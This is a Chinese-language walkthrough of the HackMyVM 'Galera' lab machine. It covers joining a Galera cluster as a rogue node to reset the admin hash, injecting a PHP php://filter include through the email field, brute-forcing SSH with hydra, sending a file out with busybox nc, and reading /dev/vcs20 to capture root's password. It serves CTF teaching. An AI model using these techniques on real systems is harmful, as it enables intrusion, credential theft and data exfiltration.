HackMyVM-Galera-Walkthrough

信息收集

服务探测

❯ sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1    00:50:56:c0:00:08       VMware, Inc.
192.168.60.2    00:50:56:e4:1a:e5       VMware, Inc.
192.168.60.193  08:00:27:c9:34:bd       PCS Systemtechnik GmbH
192.168.60.254  00:50:56:fd:a3:7d       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.096 seconds (122.14 hosts/sec). 4 responded
❯ export ip=192.168.60.193
❯ rustscan -a $ip
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
TreadStone was here 🚀

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.193:22
Open 192.168.60.193:80
Open 192.168.60.193:4567
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-23 15:59 CST
Initiating ARP Ping Scan at 15:59
Scanning 192.168.60.193 [1 port]
Completed ARP Ping Scan at 15:59, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 15:59
Completed Parallel DNS resolution of 1 host. at 15:59, 0.00s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 15:59
Scanning 192.168.60.193 [3 ports]
Discovered open port 80/tcp on 192.168.60.193
Discovered open port 4567/tcp on 192.168.60.193
Discovered open port 22/tcp on 192.168.60.193
Completed SYN Stealth Scan at 15:59, 0.06s elapsed (3 total ports)
Nmap scan report for 192.168.60.193
Host is up, received arp-response (0.0012s latency).
Scanned at 2025-05-23 15:59:02 CST for 0s

PORT     STATE SERVICE REASON
22/tcp   open  ssh     syn-ack ttl 64
80/tcp   open  http    syn-ack ttl 64
4567/tcp open  tram    syn-ack ttl 64
MAC Address: 08:00:27:C9:34:BD (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.39 seconds
           Raw packets sent: 4 (160B) | Rcvd: 8 (1.128KB)

目录枚举

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,zip,txt -b 404,403
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.60.193
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404,403
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,html,zip,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/login.php            (Status: 302) [Size: 0] [--> /]
/info.php             (Status: 200) [Size: 77326]
/index.php            (Status: 200) [Size: 825]
/upload               (Status: 301) [Size: 317] [--> http://192.168.60.193/upload/]
/logout.php           (Status: 302) [Size: 0] [--> index.php]
/config.php           (Status: 200) [Size: 0]
Progress: 1102795 / 1102800 (100.00%)
===============================================================
Finished
===============================================================

浏览器访问一下，存在登录表单

另外还有一个端口4567，利用nc监听一下

发现都是一些乱码，开头好像都是2400 0002构成的

❯ nc -vn $ip 4567
(UNKNOWN) [192.168.60.193] 4567 (?) open
$ZJz7g2Rf7Ufg.
❯ nc -vn $ip 4567
(UNKNOWN) [192.168.60.193] 4567 (?) open
$wQJJz7g2RhZ.7(b
❯ nc -vn $ip 4567|xxd
(UNKNOWN) [192.168.60.193] 4567 (?) open
00000000: 2400 0002 ba19 d617 0001 1000 d44a 927a  $............J.z
00000010: 37ae 11f0 9d87 1e67 329e 5216 6eb1 1a12  7......g2.R.n...

00000020: 37b0 11f0 a230 c73a 6124 c463            7....0.:a$.c
❯ nc -vn $ip 4567|xxd
(UNKNOWN) [192.168.60.193] 4567 (?) open
00000000: 2400 0002 8d09 ade6 0001 1000 d44a 927a  $............J.z
00000010: 37ae 11f0 9d87 1e67 329e 5216 71c0 91df  7......g2.R.q...
00000020: 37b0 11f0 b78b df77 af19 84fe            7......w....

没什么线索，/info.php中可以查看phpinfo

可以从中得知被禁用的php函数

通过查看网页源代码，发现token被隐藏了

前端去掉type="hidden"，就可以显示了

但没有什么用

Galera 集群框架

还是专注于4567端口吧

经过群友的提示，可以搜寻靶机名字相关的，得知Galera可能是也称同步集群框架

并且之前nc连接后出现的乱码也进一步的印证了是Galera节点使用专有协议进行通信

所以我们可以进行伪装为 Galera 节点加入集群，然后修改数据库中的密码，达到进入web登录表单的目的

首先装一下Galear框架，然后编辑一下配置文件，启动一个单节点的Galear数据库

❯ sudo vi /etc/mysql/conf.d/mysql.cnf
[mysqld]
# Galera Cluster Settings (Crucial for joining)
wsrep_on = ON
wsrep_provider = /usr/lib/galera/libgalera_smm.so
wsrep_cluster_address = "gcomm://"
wsrep_node_address = "192.168.60.100:4567"
wsrep_node_name = "my_evil_node"

# 重要的端口设置，确保你的MariaDB客户端连接端口不会和Galera冲突，或者确保被目标Galera集群能访问
bind-address = 0.0.0.0
port = 3306

binlog_format=ROW
default_storage_engine=InnoDB
innodb_autoinc_lock_mode=2
innodb_flush_log_at_trx_commit=0
❯ sudo systemctl stop mariadb
❯ sudo galera_new_cluster

然后将cluster_address改为靶机ip，加入已存在的Galera Cluster

重启mariadb后

❯ sudo vim /etc/mysql/conf.d/mysql.cnf
…………………………
wsrep_cluster_address = "gcomm://192.168.60.193"
…………………………
❯ sudo systemctl restart mariadb

此时我们尝试连接本地的数据库会发现有个galeradb 同步过来了

❯ mysql -u root -padmin
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 40
Server version: 11.4.3-MariaDB-1 Debian n/a

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> show databases;
+--------------------+
| Database           |
+--------------------+
| galeradb           |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.001 sec)
MariaDB [(none)]> use galeradb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [galeradb]> show tables;
+--------------------+
| Tables_in_galeradb |
+--------------------+
| users              |
+--------------------+
1 row in set (0.000 sec)

MariaDB [galeradb]> select * from users;
+----+----------+------------------+--------------------------------------------------------------+---------------------+
| id | username | email            | password                                                     | created_at          |
+----+----------+------------------+--------------------------------------------------------------+---------------------+
|  1 | admin    | [email protected] | $2y$10$BCAQ6VSNOL9TzfE5/dnVmuc9R5PotwClWAHwRdRAt7RM0d9miJRzq | 2025-05-05 07:55:51 |
+----+----------+------------------+--------------------------------------------------------------+---------------------+
1 row in set (0.000 sec)

MariaDB [galeradb]>

得知密码hash为bCrypt，再生成一个新的密码，更新数据库，Galera Cluster 会立即同步这个更改。

MariaDB [galeradb]> update users set password = "$2a$12$CkewrEGSS7dLbfapvfJVl.Jloq9WKR9bdRlYk6Thx2m/D7mXKE522" where id = 1 ;
Query OK, 1 row affected (0.002 sec)
Rows matched: 1  Changed: 1  Warnings: 0

MariaDB [galeradb]> exit;
Bye

有时候登录后还是不行，重启mariadb重新操作即可

登录后，可以进行发送消息，并且可以查看消息历史

所以可以尝试在发送消息的地方注入xxs，但是不会解析

PHP filter链

不过你可以发现除了消息会显示在上面，还有用户的邮箱也会显示

而且我们可以修改数据库，直接再插入一条记录，将邮箱名改成php代码

因为在上文的phpinfo中可以得知是 PHP 允许使用 URL 形式来打开文件

所以可以使用php流过滤器进行读取/etc/passwd的内容

<?php include 'php://filter/read=convert.base64-encode/resource=/etc/passwd'; ?>

MariaDB [galeradb]> INSERT INTO users (username, email, password, created_at) VALUES ('abc', "<?php include 'php://filter/read=convert.base64-encode/resource=/etc/passwd'; ?>", '$2a$12$CkewrEGSS7dLbfapvfJVl.Jloq9WKR9bdRlYk6Thx2m/D7mXKE522', NOW());
Query OK, 1 row affected (0.002 sec)

然后尝试登录，随便发送一个消息，浏览记录

base64解码一下，得到用户donjuandeaustria

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
sshd:x:101:65534::/run/sshd:/usr/sbin/nologin
donjuandeaustria:x:1000:1000:donjuandeaustria,,,:/home/donjuandeaustria:/bin/bash
mysql:x:102:110:MySQL Server,,,:/nonexistent:/bin/false

既然他可以用php filter链进行读取文件，那也可以进行Rce操作了

然而mysql的email字段中并不能设置这么多字符，而且几乎把能禁用的函数都禁用了

MariaDB [galeradb]> INSERT INTO users (username, email, password, created_at) VALUES ('aaa', "php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7……………………………………|convert.base64-decode/resource=php://temp", '$2a$12$CkewrEGSS7dLbfapvfJVl.Jloq9WKR9bdRlYk6Thx2m/D7mXKE522'
ERROR 1406 (22001): Data too long for column 'email' at row 1

用户提权

没办法，只能尝试爆密码了

❯ hydra -l donjuandeaustria -P /usr/share/wordlists/rockyou.txt ssh://$ip -I -e ns
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-05-25 18:50:19
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344401 login tries (l:1/p:14344401), ~896526 tries per task
[DATA] attacking ssh://192.168.60.193:22/
[STATUS] 208.00 tries/min, 208 tries in 00:01h, 14344199 to do in 1149:23h, 10 active
[22][ssh] host: 192.168.60.193   login: donjuandeaustria   password: amorcito
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 6 final worker threads did not complete until end.
[ERROR] 6 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-05-25 18:53:17

得到凭证donjuandeaustria:amorcito

ssh连接一下，发现在用户家目录中存在donjuandeaustria.png

❯ ssh donjuandeaustria@$ip
The authenticity of host '192.168.60.193 (192.168.60.193)' can't be established.
ED25519 key fingerprint is SHA256:i74LSOCZyaYgs80MUKyEspadufXaKwm+caBx6pcttAo.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.193' (ED25519) to the list of known hosts.
[email protected]'s password:
Linux galera 6.1.0-34-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.135-1 (2025-04-25) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu May  8 00:14:56 2025 from 192.168.1.146
donjuandeaustria@galera:~$ ls -al
total 2056
drwx------ 2 donjuandeaustria donjuandeaustria    4096 May  8 00:12 .
drwxr-xr-x 3 root             root                4096 May  4 19:17 ..
lrwxrwxrwx 1 donjuandeaustria donjuandeaustria       9 May  7 23:04 .bash_history -> /dev/null
-rw-r--r-- 1 donjuandeaustria donjuandeaustria     220 May  4 19:17 .bash_logout
-rw-r--r-- 1 donjuandeaustria donjuandeaustria    3558 May  7 23:48 .bashrc
-rw-r----- 1 root             tty              2074781 May  8 00:04 donjuandeaustria.png
-rw------- 1 donjuandeaustria donjuandeaustria      20 May  8 00:12 .lesshst
-rw-r--r-- 1 donjuandeaustria donjuandeaustria     807 May  4 19:17 .profile
-rw-r----- 1 root             donjuandeaustria      33 May  7 21:20 user.txt
donjuandeaustria@galera:~$ cat user.txt
072f9d8c26547db59e65d7aa3e55747b

并且文件是隶属于tty组的

由于靶机中没装file没法分析文件

利用nc传一下文件到本地

❯ nc -lvp 4444 > donjuandeaustria.png
listening on [any] 4444 ...
192.168.60.193: inverse host lookup failed: Unknown host
connect to [192.168.60.100] from (UNKNOWN) [192.168.60.193] 43582
----------------
donjuandeaustria@galera:~$ busybox nc 192.168.60.100 4444 < donjuandeaustria.png

得到一个兔子

binwalk分析一下，foremost分离文件

❯ binwalk donjuandeaustria.png

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             PNG image, 1024 x 1024, 8-bit/color RGB, non-interlaced
1195          0x4AB           Certificate in DER format (x509 v3), header length: 4, sequence length: 819
2021          0x7E5           Certificate in DER format (x509 v3), header length: 4, sequence length: 1146
14398         0x383E          JPEG image data, JFIF standard 1.02
65084         0xFE3C          Certificate in DER format (x509 v3), header length: 4, sequence length: 819
65910         0x10176         Certificate in DER format (x509 v3), header length: 4, sequence length: 1146
78457         0x13279         Zlib compressed data, default compression
❯ foremost donjuandeaustria.png
Processing: donjuandeaustria.png
|*|

什么也没有，显然图片大概是兔子洞的含义吧

Root提权

利用linpeas.sh扫一下，发现root最后登录的终端是tty20

donjuandeaustria@galera:~$ w
 08:43:35 up  5:00,  2 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
root     tty20    -                03:43    5:00m  0.00s   ?    -bash
donjuand pts/0    192.168.60.100   06:55    0.00s  0.10s  0.01s w

并且可以得知当前用户隶属于tty和video用户组中

donjuandeaustria@galera:~$ id
uid=1000(donjuandeaustria) gid=1000(donjuandeaustria) groups=1000(donjuandeaustria),5(tty),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),100(users),106(netdev)

通过查阅组相关利用

将帧缓冲区的原始像素数据导出为一个图像文件

然而你如果想以文字形式查看屏幕上显示的内容则需执行cat /dev/vcs20，虽然格式有点问题

可发现tty20中存在root的凭证saG58zJxs8crgQa366Uw

donjuandeaustria@galera:~$ cat /dev/vcs20
…………………… [*] Machine: Galera                                                                                                                                             [*] Platform: HackMyVM                                                                                                                                          [*] Author: Lenam                                                                                                                                               [*] IP: 192.168.60.193                                                                                                                                                                                                                                                                                                         galera login: root (automatic login)                                                                                                                                                                                                                                                                                            Linux galera 6.1.0-34-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.135-1 (2025-04-25) x86_64                                                                                                                                                                                                                                         The programs included with the Debian GNU/Linux system are free software;                                                                                       the exact distribution terms for each program are described in the                                                                                              individual files in /usr/share/doc/*/copyright.                                                                                                                                                                                                                                                                                 Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent                                                                                               permitted by applicable law.                                                                                                                                    Last login: Fri May 23 03:54:55 EDT 2025 on tty20                                                                                                                                                                                                                                                                                 ********************************************                                                                                                                           Welcome, System Administrator!                                                                                                                           ********************************************                                                                                                                                                                                                                                                                                    Reminder: your root password is 'saG58zJxs8crgQa366Uw'                                                                                                                                                                                                                                                                        root@galera:~#                                                                                                                                                                                            

在 Linux 中，对于文本模式的虚拟控制台（TTY），有一个专门的设备可以让你读取当前终端缓冲区中的字符数据。这些设备是：

• /dev/vcsN (Virtual Console Screen): 这个文件直接提供指定虚拟控制台 N 的字符内容。
• /dev/vcsaN (Virtual Console Screen with Attributes): 除了字符内容，这个文件还提供每个字符的属性（如颜色、粗体、下划线等）。通常，它的前几个字节会包含控制台的宽度和高度信息。

直接登录即可

donjuandeaustria@galera:~$ su root
Password:
root@galera:/home/donjuandeaustria# cd ~
root@galera:~# id
uid=0(root) gid=0(root) groups=0(root)
root@galera:~# cat root.txt
6a0d424c13321ca6e3b2deb2295fcc26

后记

具体实现就是在.profile文件中定义了root登录就打印出欢迎和密码等相关信息

然而为什么会触发，猜测大概是作者手动通过物理访问切换到了 tty20，然后输入了 root 用户名和密码

root@galera:~# cat .profile
# ~/.profile: executed by Bourne-compatible login shells.

if [ "$BASH" ]; then
  if [ -f ~/.bashrc ]; then
    . ~/.bashrc
  fi
fi

mesg n 2> /dev/null || true


# Comprueba que es root e interactivo
if [ "$(id -u)" = "0" ] && [ -n "$PS1" ]; then
  # Mantén todo lo que ya imprime el sistema (last login, motd, etc.)
  # y luego añade tu mensaje en inglés:
  echo
  echo "  ********************************************"
  echo "         Welcome, System Administrator!"
  echo "  ********************************************"
  echo
  # Recordatorio de contraseña:
  # Opción A: la pones directamente
  echo "  Reminder: your root password is 'saG58zJxs8crgQa366Uw'"
  echo
fi